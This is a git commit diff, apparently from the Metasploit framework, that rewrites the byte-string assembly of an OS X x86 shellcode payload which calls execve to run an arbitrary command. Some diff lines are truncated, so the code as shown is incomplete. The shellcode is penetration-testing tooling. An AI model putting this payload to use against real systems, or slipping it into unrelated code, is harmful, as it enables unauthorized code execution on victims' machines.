Change to += syntax.

Joe Vennix 2013-07-17 21:11:24 -05:00
parent ab088712ba
commit 9c1228067c
1 changed files with 22 additions and 21 deletions

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@ -31,7 +31,8 @@ module Metasploit3
'joev <jvennix[at]>' ],
'License' => BSD_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86))
'Arch' => ARCH_X86
# Register exec options
@ -53,38 +54,38 @@ module Metasploit3
arg_str = { |a| "#{a}\x00" }.join
# Stuff an array of arg strings into memory
payload = ''
payload << "\x31\xc0" # XOR EAX, EAX (eax => 0)
payload << # JMPs over CMD_STR, stores &CMD_STR on stack
payload << arg_str
payload << "\x5B" # POP EBX (EBX => &CMD)
payload = "\x31\xc0" + # xor eax, eax (eax => 0) + # jmp over CMD_STR, stores &CMD_STR on stack
arg_str +
"\x5B" # pop ebx (ebx => &CMD_STR)
# now EBX contains &cmd_parts[0], the exe path
if cmd_parts.length > 1
# Build an array of pointers to the arguments we copied on to the stack
payload << "\x89\xD9" # MOV ECX, EBX
payload << "\x50" # PUSH EAX; null byte (end of array)
payload << "\x89\xe2" # MOV EDX, ESP (EDX points to the end-of-array null byte)
payload += "\x89\xD9" + # mov ecx, ebx
"\x50" + # push eax; null byte (end of array)
"\x89\xe2" # mov edx, esp (EDX points to the end-of-array null byte)
cmd_parts[1..-1].each_with_index do |arg, idx|
# can probably save space here by doing the loop in ASM
# for each arg, push its current memory location on to the stack
payload << "\x81\xC1" # ADD ECX, + ...
payload << [cmd_parts[idx].length+1].pack('V') # (cmd_parts[idx] is the prev arg)
payload << "\x51" # PUSH ECX (&cmd_parts[idx])
payload += "\x81\xC1" + # add ecx, ...
[cmd_parts[idx].length+1].pack('V') +
# (cmd_parts[idx] is the prev arg)
"\x51" # push ecx (&cmd_parts[idx])
payload << "\x53" # PUSH EBX (&cmd_parts[0])
payload << "\x89\xe1" # MOV ECX, ESP (ptr to ptr to first str)
payload << "\x52" # PUSH EDX
payload << "\x51" # PUSH ECX
payload += "\x53" + # push ebx (&cmd_parts[0])
"\x89\xe1" + # mov ecx, esp (ptr to ptr to first str)
"\x52" + # push edx
"\x51" # push ecx
# pass NULL args array to execve() call
payload << "\x50\x50" # PUSH EAX, PUSH EAX
payload += "\x50\x50" # push eax, push eax
payload << "\x53" # PUSH EBX
payload << "\xb0\x3b" # MOV AL, 0x3B (execve)
payload << "\x50" # PUSH EAX
payload << "\xcd\x80" # INT 0x80 (triggers execve syscall)
payload += "\x53" + # push ebx
"\xb0\x3b" + # mov al, 0x3b (execve)
"\x50" + # push eax
"\xcd\x80" # int 0x80 (triggers execve syscall)